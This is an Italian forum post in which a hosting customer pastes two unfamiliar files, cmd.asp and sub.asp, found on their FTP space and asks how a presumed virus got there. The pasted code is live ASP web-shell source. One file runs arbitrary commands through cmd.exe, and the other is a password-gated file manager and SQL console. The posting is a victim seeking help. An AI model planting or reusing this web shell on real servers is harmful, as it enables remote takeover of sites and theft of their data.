Ciao a tutti sul mio spazio FTP di un sito registrato con xxxxx mi trovo due file cmd.asp e sub.asp (che io non ho mai uploadato).
Il contenuto dei file è:
cmd.asp
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if
response.write("<textarea readonly cols=80 rows=20>")
On Error Resume Next
response.write oScriptlhn.exec("c:\recycler\cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
response.write("<form method='post'>")
response.write("<input type=text name='c' size=60>
")
response.write("<input type=submit value='run'></form>")
%>
sub.asp (c'è solo qualcosa, tutto il file occupa 40 kb)
<object runat="server" id="ws" scope="page" classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat="server" id="ws" scope="page" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<object runat="server" id="sa" scope="page" classid="clsid:13709620-C279-11CE-A49E-444553540000"></object>
<%
Server.ScriptTimeout=5000
Response.Buffer = True
On Error Resume Next
ApplicationName = "Wellcome"
UserPass = "a2luZ3NoaQ=="
ShowFileIco = Flase
IcoPath = ""
logintype0 = ""
logintype1 = ""
theAct = Request("theAct")
thePath = Request("thePath")
URL = Request.ServerVariables("URL")
ServerURL = Request.ServerVariables("HTTP_HOST")
ServerIP = Request.ServerVariables("LOCAL_ADDR")
Action = Request("Action")
RootPath = Server.MapPath(".")
WWWRoot = Server.MapPath("/")
FolderPath = Request("FolderPath")
FName = Request("FName")
Const ALL_INIT ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv wxyz0123456789+/"
Const editableFileExt = "$vbs$log$asp$txt$php$ini$inc$htm$html$xml$conf$co nfig$jsp$java$htt$lst$aspx$php3$php4$js$css$bat$as a$"
BackUrl = "<meta http-equiv='refresh' content='1;URL=?Action=ShowFile'>"
dim EncodeGroup(63)
Dim SearchGroup(127)
Call initCodecs
If Request("makepwd")<>"" Then
echo "Your Encode PassWord is: "&MyEncode(Request("makepwd"))
Response.End()
End If
If Session("KKK")<>UserPass Then
If Request.Form("LPass")<>"" Then
If MyEncode(Request.Form("LPass"))=UserPass Then
Session("KKK")=UserPass
Response.Redirect Request.ServerVariables("HTTP_REFERER")
Else
echo"Failed"
End If
Else
If Request(logintype0)<>logintype1 then
echo "<script>window.close();</script>"
Else
Sl="<center>
"
Sl=Sl&"<form action='"&URL&"' method='post'>"
Sl=Sl&"ÄÇÒ»½£µÄ·çÇé:<input name='LPass' type='password' size='16'>"
Sl=Sl&"<input type='submit' value='»¶Ó_Äú'></form></center>"
echo Sl
End If
End If
Response.End
End If
Sub echo(str)
Response.Write(str)
End Sub
[...]
If Len(DbStr)>40 Then
Set Conn=CreateObject(ObT(5,0))
Conn.Open DbStr
Set Rs=Conn.OpenSchema(20)
Sl=Sl&"<table><tr height='25' Bgcolor='#CCCCCC'><td>Table
Name</td>"
Rs.MoveFirst
Do While Not Rs.Eof
If Rs("TABLE_TYPE")="TABLE" then
TName=Rs("TABLE_NAME")
Sl=Sl&"<td align=center>[ del ]
"
Sl=Sl&""&TName&"</td>"
End If
Rs.MoveNext
Loop
Set Rs=Nothing
Sl=Sl&"</tr></table>"
echo Sl:Sl=""
If Len(SqlStr)>10 Then
If LCase(Left(SqlStr,6))="select" then
Sl=Sl&"Ö´ÐÐÓï¾ä£º"&SqlStr
Set Rs=CreateObject("Adodb.Recordset")
Rs.open SqlStr,Conn,1,1
FN=Rs.Fields.Count
RC=Rs.RecordCount
Rs.PageSize=500
Count=Rs.PageSize
PN=Rs.PageCount
Page=request("Page")
If Page<>"" Then Page=Clng(Page)
If Page="" Or Page=0 Then Page=1
If Page>PN Then Page=PN
If Page>1 Then Rs.absolutepage=Page
Sl=Sl&"<table><tr height=25 bgcolor=#cccccc><td></td>"
For n=0 to FN-1
Set Fld=Rs.Fields.Item(n)
Sl=Sl&"<td align='center'>"&Fld.Name&"</td>"
Set Fld=nothing
Next
Sl=Sl&"</tr>"
Do While Not(Rs.Eof or Rs.Bof) And Count>0
Count=Count-1
Bgcolor="#EFEFEF"
Sl=Sl&"<tr><td bgcolor=#cccccc><font face='wingdings'>x</font></td>"
For i=0 To FN-1
If Bgcolor="#EFEFEF" Then:Bgcolor="#F5F5F5":Else:Bgcolor="#EFEFEF":End if
If RC=1 Then
ColInfo=HTMLEncode(Rs(i))
Else
ColInfo=HTMLEncode(Left(Rs(i),50))
End If
Sl=Sl&"<td bgcolor="&Bgcolor&">"&ColInfo&"</td>"
Next
Sl=Sl&"</tr>"
Rs.MoveNext
Loop
echo Sl:Sl=""
SqlStr=HtmlEnCode(SqlStr)
Sl=Sl&"<tr><td colspan="&FN+1&" align=center>Record Count£º"&RC&"Page£º"&Page&"/"&PN
If PN>1 Then
Sl=Sl&"HomePrevious"
If Page>8 Then:Sp=Page-8:Else:Sp=1:End if
For i=Sp To Sp+8
If i>PN Then Exit For
If i=Page Then
Sl=Sl&i&""
Else
Sl=Sl&""&i&""
End If
Next
Sl=Sl&"NextLast"
End If
Sl=Sl&"<hr color='#EFEFEF'></td></tr></table>"
Rs.Close:Set Rs=Nothing
echo Sl:Sl=""
Else
Conn.Execute(SqlStr)
Sl=Sl&"SQLÓï¾ä£º"&SqlStr
End If
echo Sl:Sl=""
End If
Conn.Close
Set Conn=Nothing
End If
End Function
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=ApplicationName&"-"&ServerIP&"-"%></title>
<style type="text/css">
<!--
body,td {font-size: 12px;}
input,select{font-size: 12px;background-color:#FFFFFF;}
.tr {background-color:#EFEFEF;}
.cmd {background-color:#000000;color:#FFFFFF}
body {margin-left: 0px;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;
<%If Action="" then response.write "overflow-x:hidden;overflow-y:hidden;"%>}
a {color: black;text-decoration: none;}
.am {color: #003366;font-size: 11px;}
-->
</style>
[...]
Immagino che sia un virus, ma come ci è arrivato sullo spazio hosting?
Rispondi quotando
